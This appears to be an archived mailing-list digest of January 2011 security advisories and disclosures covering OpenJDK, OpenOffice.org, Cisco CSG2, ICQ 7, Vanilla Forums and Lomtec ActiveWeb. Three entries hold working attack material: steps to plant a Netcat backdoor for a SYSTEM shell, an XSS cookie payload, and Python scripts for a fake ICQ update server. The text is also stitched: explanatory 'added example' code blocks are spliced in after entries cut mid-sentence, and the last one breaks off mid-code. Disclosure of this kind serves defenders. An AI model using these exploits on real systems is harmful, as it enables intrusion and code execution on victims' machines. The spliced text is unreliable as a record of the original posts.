[USN-1052-1] OpenJDK vulnerability

2011-01-27 Thread Steve Beattie
===
Ubuntu Security Notice USN-1052-1  January 26, 2011
openjdk-6, openjdk-6b18 vulnerability
CVE-2010-4351
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  icedtea6-plugin 6b20-1.9.4-0ubuntu1~9.10.1

Ubuntu 10.04 LTS:
  icedtea6-plugin 6b20-1.9.4-0ubuntu1~10.04.1

Ubuntu 10.10:
  icedtea6-plugin 6b20-1.9.4-0ubuntu1

After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.

Details follow:

It was discovered that the JNLP SecurityManager in IcedTea for Java
OpenJDK in some instances failed to properly apply the intended
security policy in its checkPermission method. This could allow an
attacker to execute code with privileges that should have been prevented.
(CVE-2010-4351)


Updated packages for Ubuntu 9.10:


HTB22796: Path disclosure in DBHcms

2011-01-27 Thread advisory
Vulnerability ID: HTB22796
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_dbhcms.html
Product: DBHcms
Vendor: Kai-Sven Bunk ( http://www.drbenhur.com/ ) 
Vulnerable Version: 
Vendor Notification: 13 January 2011 
Vulnerability Type: Path disclosure
Status: Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to a failure in the
"/dbhcms/ext/news/ext.news.settings.php" script; it is possible to generate an
error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other
potentially sensitive information.

http://host/dbhcms/ext/news/ext.news.settings.php




Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and Execution as SYSTEM in ColdFusion (2010-WEB-002) (CERT VU#528212)

2011-01-27 Thread StenoPlasma @ www.ExploitDevelopment.com
-
www.ExploitDevelopment.com 2010-WEB-002
(CERT VU#870532) (Security Focus BID 45985)
-

TITLE:
Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and
Execution as SYSTEM in ColdFusion

SUMMARY AND IMPACT:
The ActiveWeb Professional 3.0 web content management server is
vulnerable to remote operating system takeover. An unauthenticated
remote user can upload malicious files and backdoor ColdFusion
websites using the EasyEdit.cfm page. By accessing the "getImagefile"
section of the EasyEdit module, the remote attacker can change hidden
form fields to upload malicious applications and ColdFusion CFML
websites that execute those malicious applications or operating system
commands in the context of the ColdFusion service account (SYSTEM).
The remote user can now perform all functions of the system
administrator using uploaded CFML pages. The attacker can create a
SYSTEM level shell connection back to the attacker's computer, add
local administrator accounts, gather information about the victim
company's network or set up a sniffer to capture passwords. Other
pages on the ActiveWeb Professional CMS allow unauthenticated users to
perform directory listings of the entire Microsoft Windows operating
system.

DETAILS:
Use the following steps to exploit this vulnerability.

Step 1: Access the ActiveWeb Get Image File Module.
http://VICTIMIP/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter=
Step 2: Using Mozilla FireFox with the Web Developer Toolbar, change
the UploadDirectory hidden form field to C:\. Change the Accepted
Extensions hidden form field to exe. Now you can upload the malicious
application (Example would be Netcat.exe).
Step 3: Using Mozilla FireFox with the Web Developer Toolbar, change
the UploadDirectory hidden form field to
c:\activeweb\activeweb\wwwroot\. Change the Accepted Extensions hidden
form field to cfml. Upload your backdoor NetCat.cfml ColdFusion page
that calls CFEXECUTE to run the malicious application.
Step 4: Using Netcat.exe on the attacker's machine, listen for the
VICTIM server's remote shell.
Step 5: Using Mozilla FireFox, access the newly uploaded NetCat.cfml
backdoor page via http://VICTIMIP/activeweb/NetCat.cfml.
Step 6: You will now get a remote shell on your NetCat listener
running as the ColdFusion service account (Default is SYSTEM on
Microsoft Windows).

VULNERABLE PRODUCTS:
Lomtec ActiveWeb Professional 3.0

REFERENCES AND ADDITIONAL INFORMATION:
N/A

CREDITS:
StenoPlasma (at) ExploitDevelopment.com

TIMELINE:
Discovery: December 16, 2008
Vendor Notified: May 6, 2010 (No response from vendor)
Vendor Notified Attempt 2: May 10, 2010 (No response from vendor)
Vendor Notified Attempt 3: May 19, 2010 (No response from vendor)
Vendor Fixed: N/A
Vendor Notified of Disclosure: N/A
Disclosure to CERT: December 2, 2010
CERT Published: January 25, 2011

VENDOR URL:
http://www.lomtec.com

ADVISORY URL:
http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-002.html
http://www.kb.cert.org/vuls/id/528212
http://www.securityfocus.com/bid/45985/info

VENDOR ADVISORY URL:
N/A

-
StenoPlasma at ExploitDevelopment.com
www.ExploitDevelopment.com
-


HTB22797: Path disclosure in BLOG:CMS

2011-01-27 Thread advisory
Vulnerability ID: HTB22797
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulán ( http://blogcms.com/ ) 
Vulnerable Version: 4.2.1.f and probably prior versions
Vendor Notification: 13 January 2011 
Vulnerability Type: Path disclosure
Status: Not Fixed
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to a failure in the "extras/postman/postman.php",
"admin/plugins/NP_RSSAtomAggregator.php" and "admin/plugins/NP_Newsfeed.php"
scripts; it is possible to generate an error that will reveal the full path of
the script.
A remote user can determine the full path to the web root directory and other
potentially sensitive information.


http://host/extras/postman/postman.php
http://host/admin/plugins/NP_RSSAtomAggregator.php
http://host/admin/plugins/NP_Newsfeed.php





[SECURITY] [DSA 2151-1] New OpenOffice.org packages fix several vulnerabilities

2011-01-27 Thread Martin Schulze

--------------------------------------------------------------------------
Debian Security Advisory DSA 2151-1                   secur...@debian.org
http://www.debian.org/security/                           Martin Schulze
January 26th, 2011                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : openoffice.org
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2010-3450 CVE-2010-3451 CVE-2010-3452 CVE-2010-3453
                 CVE-2010-3454 CVE-2010-3689 CVE-2010-4253 CVE-2010-4643

Several security related problems have been discovered in the
OpenOffice.org package that allow malformed documents to trick the
system into crashes or even the execution of arbitrary code.

CVE-2010-3450

During an internal security audit within Red Hat, a directory
traversal vulnerability has been discovered in the way
OpenOffice.org 3.1.1 through 3.2.1 processes XML filter files.  If
a local user is tricked into opening a specially-crafted OOo XML
filters package file, this problem could allow remote attackers to
create or overwrite arbitrary files belonging to local user or,
potentially, execute arbitrary code.

CVE-2010-3451

During his work as a consultant at Virtual Security Research
(VSR), Dan Rosenberg discovered a vulnerability in
OpenOffice.org's RTF parsing functionality.  Opening a maliciously
crafted RTF document can cause an out-of-bounds memory read into
previously allocated heap memory, which may lead to the execution
of arbitrary code.

CVE-2010-3452

Dan Rosenberg discovered a vulnerability in the RTF file parser
which can be leveraged by attackers to achieve arbitrary code
execution by convincing a victim to open a maliciously crafted RTF
file.

CVE-2010-3453

As part of his work with Virtual Security Research, Dan Rosenberg
discovered a vulnerability in the WW8ListManager::WW8ListManager()
function of OpenOffice.org that allows a maliciously crafted file
to cause the execution of arbitrary code.

CVE-2010-3454

As part of his work with Virtual Security Research, Dan Rosenberg
discovered a vulnerability in the WW8DopTypography::ReadFromMem()
function in OpenOffice.org that may be exploited by a maliciously
crafted file, which allows an attacker to control program flow
and potentially execute arbitrary code.

CVE-2010-3689

Dmitri Gribenko discovered that the soffice script does not treat
an empty LD_LIBRARY_PATH variable like an unset one, which may lead to
the execution of arbitrary code.

CVE-2010-4253

A heap-based buffer overflow has been discovered with unknown impact.

CVE-2010-4643

A vulnerability has been discovered in the way OpenOffice.org
handles TGA graphics: a specially crafted TGA file could cause
the program to crash due to a heap-based buffer overflow, with
unknown impact.


For the stable distribution (lenny) these problems have been fixed in
version 2.4.1+dfsg-1+lenny11.

For the upcoming stable distribution (squeeze) these problems have
been fixed in version 3.2.1-11+squeeze1.

For the unstable distribution (sid) these problems have been fixed in
version 3.2.1-11+squeeze1.

For the experimental distribution these problems have been fixed in
version 3.3.0~rc3-1.

We recommend that you upgrade your OpenOffice.org packages.


Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org




OpenOffice.org Multiple Memory Corruption Vulnerabilities

2011-01-27 Thread VSR Advisories


                         VSR Security Advisory
                       http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities
  Release Date: 2011-01-26
   Application: Oracle OpenOffice.org
      Versions: 3.2 and earlier
      Severity: High
        Author: Dan Rosenberg
 Vendor Status: Patch Released
CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454
     Reference: http://www.vsecurity.com/resources/advisory/20110126-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 "OpenOffice.org 3 is the leading open-source office software suite for word
  processing, spreadsheets, presentations, graphics, databases and more.  It is
  available in many languages and works on all common computers.  It stores all
  your data in an international open standard format and can also read and write
  files from other common office software packages.  It can be downloaded and
  used completely free of charge for any purpose."

Vulnerability Overview
----------------------
On August 20th, VSR identified multiple memory corruption vulnerabilities in
OpenOffice.org.  By convincing a victim to open a maliciously crafted RTF or
Word document, arbitrary code may be executed on the victim's machine.

Vulnerability Details
---------------------

CVE-2010-3451:

OpenOffice.org uses its own internal memory management system for parsing
tables in RTF documents.  Information about each table row is inserted, element
by element, into an SwTableBoxes object.  These objects contain a fixed amount
of data, and when they have reached capacity, a resize() method is called to
double the space previously allocated for cell contents.  When this method is
called, the new space will be allocated on top of recently freed memory
containing file data without clearing this memory.  Because of a bug in the RTF
parser, corrupt table data may cause the insertion of elements into an
SwTableBoxes object to skip an index rather than remaining strictly sequential.
When this occurs, the nA field, representing the number of data elements used
in the object, will be out-of-sync with the index of the most recently inserted
element, allowing exploitation of a use-after-free vulnerability.

To exploit this issue, corrupt RTF table data first causes the nA field to
become out-of-sync with the index of the most recently inserted element in an
SwTableBoxes object.  Next, the resize() method is called when the object
reaches capacity, resulting in its data being reallocated on top of
attacker-controlled memory.  Finally, during the parsing of an RTF_ROW token,
the nA field is used to index into the SwTableBoxes cell data in an attempt to
retrieve the most recently added object.  Because this index is out-of-sync and
the data was recently moved on top of previously used memory, this will result
in retrieving an attacker-controlled object from the heap.  Subsequent usage of
this object may allow an attacker to control program flow and execute arbitrary
code.

CVE-2010-3452:

Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for
multi-level lists, it is possible to trigger a use-after-free vulnerability.
When this tag is followed by an unexpected character, its token value may be
negative.  The parser attempts to restrict this value to less than the MAXLEVEL
constant, but since a signed comparison is used, a negative value will pass
this check.  This value is then used as an index to retrieve an SwNumFmt object
from an array on the heap.  By manipulating the heap, it is possible to cause
the retrieval of an attacker-controlled object.  Subsequent usage of this
object may allow an attacker to control program flow and execute arbitrary
code.

CVE-2010-3453:

When processing "override level numbers" in parsing list data for Word
documents, a user-controlled value is used to index into a vector for an
assignment without checking that this index is less than the size of the
vector.  As a result, an attacker-controlled object may be written to a
location on the heap past the bounds of the vector, potentially allowing
arbitrary code execution.

CVE-2010-3454:

When parsing Word documents, two signed short values are read directly from the
document file to determine where to place NULL terminators after copying
additional data in.  Because these indexes are not checked in any way, an
attacker may use this to write NULL bytes to two arbitrary locations in memory,
potentially allowing arbitrary code execution.

Versions Affected
-----------------
Versions prior to OpenOffice.org 3.3 are affected.

Vendor Response
---------------
The following timeline details OpenOffice.org's response to the reported issues:

2010-08-20    Initial report for CVE-2010-3452
20
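
The three input-validation defects VSR describes above (a signed list level checked only against MAXLEVEL, an override level number used as a vector index without a size check, and two file-supplied signed shorts used as NUL-terminator offsets) all reduce to a missing lower or upper bound check. The C sketch below is an added example, not code from VSR or from OpenOffice.org: MAXLEVEL's value, the struct names and the buffer sizes are constructed stand-ins, and each hardened function shows the check the advisory says was absent, next to the flawed comparison for contrast.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for OpenOffice.org's MAXLEVEL; the advisory names the
 * constant but not its value. */
#define MAXLEVEL 9

/* Constructed stand-ins for the SwNumFmt array an RTF list level selects. */
typedef struct { int fmt_id; } NumFmt;
typedef struct { NumFmt fmts[MAXLEVEL]; } NumRule;

/* CVE-2010-3452 pattern: the \pnseclvl token value is signed and only the
 * upper bound is tested, so a negative level passes and indexes before the
 * start of the array. This is the flawed check, kept for contrast. */
int level_ok_flawed(int level) {
    return level < MAXLEVEL;
}

/* Hardened check: reject negative values explicitly. Comparing the value as
 * unsigned ((unsigned)level < MAXLEVEL) is the equivalent single-test form. */
int level_ok_fixed(int level) {
    return level >= 0 && level < MAXLEVEL;
}

/* Lookup that refuses to dereference an out-of-range level. */
const NumFmt *get_fmt(const NumRule *rule, int level) {
    if (!level_ok_fixed(level))
        return NULL;
    return &rule->fmts[level];
}

/* CVE-2010-3453 pattern: a document-supplied "override level number" is used
 * as a vector index for an assignment. The hardened form checks the index
 * against the vector's current size before writing. */
typedef struct { int *items; size_t size; } IntVec;

int vec_assign_checked(IntVec *v, int idx, int value) {
    if (idx < 0 || (size_t)idx >= v->size)
        return 0;               /* would have been an out-of-bounds heap write */
    v->items[idx] = value;
    return 1;
}

/* CVE-2010-3454 pattern: two signed 16-bit values read straight from the
 * document choose where NUL terminators are written. The hardened form
 * bounds both offsets against the destination buffer. */
typedef struct { char text[32]; } Typography;

static int16_t read_i16_le(const uint8_t *p) {
    return (int16_t)((uint16_t)p[0] | ((uint16_t)p[1] << 8));
}

/* Writes both terminators and returns 1 only if both offsets are inside
 * text[]; otherwise returns 0 and leaves the buffer untouched. */
int terminate_checked(Typography *t, const uint8_t *rec, size_t reclen) {
    if (reclen < 4)
        return 0;
    int16_t a = read_i16_le(rec);
    int16_t b = read_i16_le(rec + 2);
    if (a < 0 || b < 0 || (size_t)a >= sizeof t->text || (size_t)b >= sizeof t->text)
        return 0;
    t->text[a] = '\0';
    t->text[b] = '\0';
    return 1;
}

int main(void) {
    /* Constructed record: first offset is -1 (0xFFFF), second is 5. */
    const uint8_t rec[4] = { 0xff, 0xff, 0x05, 0x00 };
    Typography t;
    memset(t.text, 'A', sizeof t.text);
    printf("level -1: flawed=%d fixed=%d\n", level_ok_flawed(-1), level_ok_fixed(-1));
    printf("terminators from record accepted: %d\n", terminate_checked(&t, rec, sizeof rec));
    return 0;
}
```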

Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities

2011-01-27 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities

Advisory ID: cisco-sa-20110126-csg2

http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml

Revision 1.0

For Public Release 2011 January 26 1600 UTC (GMT)

+-

Summary
===

A service policy bypass vulnerability exists in the Cisco Content
Services Gateway - Second Generation (CSG2), which runs on the
Cisco Service and Application Module for IP (SAMI). Under certain
configurations this vulnerability could allow:

  * Customers to access sites that would normally match a billing
    policy without being charged to the end customer
  * Customers to access sites that would normally be denied based on
    configured restriction policies

Additionally, Cisco IOS Software Release 12.4(24)MD1 on the Cisco
CSG2 contains two vulnerabilities that can be exploited by a remote,
unauthenticated attacker to create a denial of service condition that
prevents traffic from passing through the CSG2. These vulnerabilities
require only a single content service to be active on the Cisco CSG2 and
can be exploited via crafted TCP packets. A three-way handshake is not
required to exploit either of these vulnerabilities.

Workarounds that mitigate these vulnerabilities are not available.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml.

Affected Products
=

The service policy bypass vulnerability affects all versions of the
Cisco IOS Software for the CSG2 prior to the first fixed release, as
indicated in the "Software Versions and Fixes" section of this advisory.

The two denial of service vulnerabilities only affect Cisco IOS Software
Release 12.4(24)MD1 on the Cisco CSG2. No other Cisco IOS Software
releases are affected.

Vulnerable Products
+--

To determine the version of Cisco IOS Software that is running on the
Cisco CSG2, issue the "show module" command from Cisco IOS Software on
the switch on which the Cisco CSG2 module is installed to identify what
modules and sub-modules are installed on the system.

Cisco CSG2 runs on the Cisco Service and Application Module for IP
(SAMI) card, and is identified in the following example in slot 2 via
the WS-SVC-SAMI-BB-K9 identification:

C7600#show module
Mod Ports Card Type                              Model              Serial No.
--- ----- -------------------------------------- ------------------ -----------
  1    2  Supervisor Engine 720 (Active)         WS-SUP720-3BXL     JAF1226ARQS
  2    1  SAMI Module (csgk9)                    WS-SVC-SAMI-BB-K9  SAD113906P1
  4   48  CEF720 48 port 10/100/1000mb Ethernet  WS-X6748-GE-TX     SAL1127T6XY

Mod MAC addresses                       Hw    Fw           Sw           Status
--- ----------------------------------- ----- ------------ ------------ -------
  1  001e.be6e.a018 to 001e.be6e.a01b   5.6   8.5(2)       12.2(33)SRC5 Ok
  2  001d.45f8.f3dc to 001d.45f8.f3e3   2.1   8.7(0.22)FW1 12.4(2010040 Ok
  4  001c.587a.ef20 to 001c.587a.ef4f   2.6   12.2(14r)S5  12.2(33)SRC5 Ok

Mod  Sub-Module                  Model              Serial       Hw     Status
---- --------------------------- ------------------ ------------ ------ -------
  1  Policy Feature Card 3       WS-F6K-PFC3BXL     JAF1226BNQM  1.8    Ok
  1  MSFC3 Daughterboard         WS-SUP720          JAF1226BNMC  3.1    Ok
  2  SAMI Daughterboard 1        SAMI-DC-BB         SAD114400L9  1.1    Other
  2  SAMI Daughterboard 2        SAMI-DC-BB         SAD114207FU  1.1    Other
  4  Centralized Forwarding Card WS-F6700-CFC       SAL1029VGFK  2.0    Ok

Mod  Online Diag Status
---- -------------------
  1  Pass
  2  Pass
  4  Pass
C7600#

After locating the correct slot, issue the "session slot processor <3-9>"
command to open a console connection to the respective Cisco CSG2. Once
connected to the Cisco CSG2, perform the "show version" command:

The following example shows that the Cisco CSG2 is running software
Release 12.4(24)MD1:

CSG2#show version
Cisco IOS Software, SAMI Software (SAMI-CSGK9-M), Version 12.4(24)MD1, 
RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 07-Apr-10 09:50 by prod_rel_team


--- output truncated ---

Products Confirmed Not Vulnerable
+

The Cisco Content Services Gateway - 1st Generation (CSG) is not
affected by these vulnerabilities.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

The Cisco Content Services Gateway - Second Generation (CSG2) provides
intelligent network capabilities such as flexible policy management
and billing based on deep-packet inspecti

Huawei HG default WEP/WPA generator

2011-01-27 Thread Pedro Joaquín
Hi,

Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks.
It  is possible to generate the default WEP/WPA key from the MAC
address.

The following documents detail the process of developing a key
generator for these devices.

English: http://websec.ca/blog/view/mac2wepkey_huawei

Español: http://websec.mx/blog/ver/mac2wepkey_huawei


Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability

2011-01-27 Thread YGN Ethical Hacker Group
==
Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability
==


1. OVERVIEW

The Vanilla Forums 2.0.16 and lower versions were vulnerable to Cross
Site Scripting.


2. BACKGROUND

Vanilla Forums are open-source, standards-compliant, customizable
discussion forums. It is specially made to help small communities grow
larger through SEO mojo, totally customizable social tools, and great
user experience. Vanilla is also built with integration at the
forefront, so it can seamlessly integrate with your existing website,
blog, or custom-built application.


3. VULNERABILITY DESCRIPTION

The 'Target' parameter was not properly sanitized after a user logs in,
which allows an attacker to conduct a Cross Site Scripting attack.
An attacker could prepare a link in a forum post that includes a link
to a file which seems to require authentication.
Upon logging in, the user will get XSSed.


4. VERSIONS AFFECTED

2.0.16 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://vanilla/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http://


6. SOLUTION

Upgrade to Vanilla Forums 2.0.17 or higher


7. VENDOR

Vanilla Forums Development Team
http://vanillaforums.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.16]_cross_site_scripting
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-27]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd


IETF RFC on "the implementation of the TCP urgent mechanism"

2011-01-27 Thread Fernando Gont
Folks,

RFC 6093, entitled "On the Implementation of the TCP Urgent Mechanism"
has just been published. It is available at:
http://www.rfc-editor.org/rfc/rfc6093.txt

This RFC has been motivated, to a large extent, by the behavior of
some well-known firewalls.

The Abstract of the RFC is:

 cut here 
   This document analyzes how current TCP implementations process TCP
   urgent indications and how the behavior of some widely deployed
   middleboxes affects how end systems process urgent indications.  This
   document updates the relevant specifications such that they
   accommodate current practice in processing TCP urgent indications,
   raises awareness about the reliability of TCP urgent indications in
   the Internet, and recommends against the use of urgent indications
   (but provides advice to applications that do).
 cut here 

More information about this and other related issues is available at
my web site: http://www.gont.com.ar

Thanks!

Best regards,
-- 
Fernando Gont
e-mail: ferna...@gont.com.ar || fg...@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1


[ MDVSA-2011:019 ] libuser

2011-01-27 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2011:019
 http://www.mandriva.com/security/
 ___

 Package : libuser
 Date: January 26, 2011
 Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in libuser:
 
 libuser before 0.57 uses a cleartext password value of (1) !! or (2) x
 for new LDAP user accounts, which makes it easier for remote attackers
 to obtain access by specifying one of these values (CVE-2011-0002).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0002
 ___

 Updated Packages:


Re: Remote Code Execution in ICQ 7

2011-01-27 Thread Daniel Seither
UPDATE:

This week, ICQ 7.4 (build 4561) was released. Even though the original
version of my exploit does not work anymore, the vulnerability was not
resolved: ICQ only changed the product ID that is included in the path
to the update file. If every occurrence of "30009" in both python files
(see original announcement below) is replaced by "30011" and afterwards
a new update.xml is generated using build_update_files.py, the attack
will still succeed.

Note to ICQ engineers if they're reading this: To really fix the issue,
introduce cryptographically signed update files.

- Daniel Seither


On 14.01.2011 13:18, Daniel Seither wrote:
> SUMMARY
> 
> The ICQ 7 instant messaging client allows remote code execution due to a
> flaw in its automatic update mechanism.
> 
> 
> VULNERABLE APPLICATIONS
> 
> All versions of ICQ 7 for Windows, up to version 7.2, build 3525 (which
> is the current version)
> 
> ICQ 6 and older versions were not tested.
> 
> Other ICQ clients should not be affected since this is a flaw in the ICQ
> software update mechanism and not in the ICQ IM protocol.
> 
> 
> DETAILS
> 
> ICQ 7 does not check the identity of the update server or the
> authenticity of the updates that it downloads through its automatic
> update mechanism. By impersonating the update server (think DNS
> spoofing), an attacker can act as an update server of its own and
> deliver arbitrary files that are executed on the next launch of the ICQ
> client. Since ICQ is automatically launched right after booting Windows
> by default and it checks for updates on every start, it can be attacked
> very reliably.
> 
> 
> REPRODUCING
> 
> (1) Create the files for the update server (see below,
> build_update_files.py)
> 
> (2) Run a fake update server (see below, run_update_server.py)
> 
> (3) Impersonate the update server. To verify the vulnerability, the
> easiest way is to add an entry for update.icq.com to the victim's
> \Windows\system32\drivers\etc\hosts file that points to the fake update
> server's IP address and clearing its DNS cache afterwards (ipconfig
> /flushdns).
> 
> The next victim that is affected by the impersonation and that launches
> the ICQ client will now automatically download and install the fake
> update. On the next restart of the ICQ software, the fake ICQ.exe will
> be executed.
> 
> 
> SOLUTION
> 
> Stop using ICQ or switch to another IM client until a fix is released
> since ICQ 7 does not offer to disable automatic updates.
> 
> 
> TIMELINE
> 
> 2010-11-12
> discovered issue
> 
> 2010-11-13
> reported issue to cert.org
> 
> 2010-11-30
> received confirmation from cert.org that they try to contact the vendor
> 
> 2011-01-13
> cert.org publishes vulnerability note because the vendor doesn't react
> 
> 
> REFERENCES
> 
> Vulnerability Note at cert.org:
> http://www.kb.cert.org/vuls/id/680540
> 
> 
> FILES
> 
> === START build_update_files.py ===
> 
> #!/usr/bin/env python
> 
> # ICQ Update File Creator by Daniel Seither (p...@tiwoc.de)
> #
> # Parameter:
> # filename of .exe that should be delivered as an update for ICQ.exe
> #
> # Overwrites ICQ.zip and updates.xml in the current directory
> # without a warning!
> 
> import sys, os
> from hashlib import md5
> from zipfile import ZipFile, ZIP_DEFLATED
> 
> if len(sys.argv) < 2:
>   print "argument missing"
>   sys.exit(1)
> 
> f = open(sys.argv[1])
> payload = f.read()
> f.close()
> 
> payload_checksum = md5(payload).hexdigest()
> payload_size = len(payload)
> 
> f = ZipFile('ICQ.zip', 'w')
> f.write(sys.argv[1], 'ICQ.exe', ZIP_DEFLATED)
> f.close()
>   
> payload_compressed = os.path.getsize('ICQ.zip')
>   
> updatesfile = (''
>   + 'http://update.icq.com/cb/icq6/30009/"/>'
>   + ''
>   + ''
>   + ''
>   ) % (payload_checksum, payload_size, payload_compressed)
> 
> updatesfile_checksum = md5(updatesfile).hexdigest()
> updatesfile = '\r\n%s' % (updatesfile_checksum, updatesfile)
> 
> f = open('updates.xml', 'w')
> f.write(updatesfile)
> f.close()
> 
> === END build_update_files.py ===
> 
> === START run_update_server.py ===
> 
> #!/usr/bin/env python
> 
> # Fake ICQ update server by Daniel Seither (p...@tiwoc.de)
> #
> # Must be run
> #  * as root
> #  * from a directory containing updates.xml and ICQ.zip
> #created by build_updates_xml.py
> 
> from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
> 
> class ICQRequestHandler(BaseHTTPRequestHandler):
>   def do_GET(self):
>   if self.path == '/cb/icq6/30009/0/updates.xml':
>   self._respond_with_file('updates.xml')
>   elif self.path == '/cb/icq6/30009/ICQ.zip':
>   self._respond_with_file('ICQ.zip')
>   else:
>   self.send_error(404)
>   
>   def _respond_with_file(self, filename):
>   f = open(filename)
>   self.send_response(200)
>   self.end_headers()
>   
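
As an added example (not Daniel Seither's code and not ICQ's actual updates.xml format), the following shows why an MD5 checksum carried inside the manifest cannot distinguish the vendor's update from an impostor's, and what the authenticity check Seither asks for adds. It assumes a constructed JSON manifest and uses an HMAC tag in place of a public-key signature so that it runs with the standard library alone; a shipped client would verify against a vendor public key instead, since a shared secret inside the client could be extracted.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed key for this demo only. In a shipped client this would be
# the vendor's public key, with the private half kept offline; HMAC
# stands in for the signature here to keep the example stdlib-only.
VENDOR_KEY = b"constructed-demo-key-not-a-real-secret"


def canonical(body: dict) -> bytes:
    """Stable byte encoding of the manifest body for tagging/verifying."""
    return json.dumps(body, sort_keys=True).encode()


def build_manifest(payload: bytes, key: Optional[bytes]) -> dict:
    """Manifest with checksum, size and an authenticity tag.

    Anyone who controls the download can fill in md5 and size; only the
    key holder can produce a tag that verifies.
    """
    body = {"file": "ICQ.zip",
            "md5": hashlib.md5(payload).hexdigest(),
            "size": len(payload)}
    tag = hmac.new(key, canonical(body), hashlib.sha256).hexdigest() if key else ""
    return {"body": body, "tag": tag}


def checksum_only_accepts(manifest: dict, payload: bytes) -> bool:
    """The kind of check the advisory describes: the download is compared
    with the manifest, but nothing ties the manifest to the vendor, so an
    impostor serving both always passes."""
    body = manifest["body"]
    return (hashlib.md5(payload).hexdigest() == body["md5"]
            and len(payload) == body["size"])


def authenticated_accepts(manifest: dict, payload: bytes, key: bytes) -> bool:
    """Verify the manifest's tag before trusting any field in it, then
    check the payload against the (now trusted) manifest."""
    expected = hmac.new(key, canonical(manifest["body"]), hashlib.sha256).hexdigest()
    # constant-time comparison; compare_digest also copes with an empty tag
    if not hmac.compare_digest(expected, manifest["tag"]):
        return False
    return checksum_only_accepts(manifest, payload)


def demo() -> dict:
    """Run the cases and return which ones each check accepts."""
    genuine = b"constructed bytes standing in for the vendor's ICQ.zip"
    forged = b"constructed bytes standing in for an impostor's ICQ.zip"
    vendor_manifest = build_manifest(genuine, VENDOR_KEY)
    impostor_manifest = build_manifest(forged, None)   # no key, no valid tag
    # Impostor re-uses the vendor's tagged manifest but edits checksum and
    # size to match its own file: the tag no longer verifies.
    tampered = {"body": dict(vendor_manifest["body"],
                             md5=hashlib.md5(forged).hexdigest(),
                             size=len(forged)),
                "tag": vendor_manifest["tag"]}
    return {
        "checksum_only_genuine": checksum_only_accepts(vendor_manifest, genuine),
        "checksum_only_forged": checksum_only_accepts(impostor_manifest, forged),
        "checksum_only_tampered": checksum_only_accepts(tampered, forged),
        "authenticated_genuine": authenticated_accepts(vendor_manifest, genuine, VENDOR_KEY),
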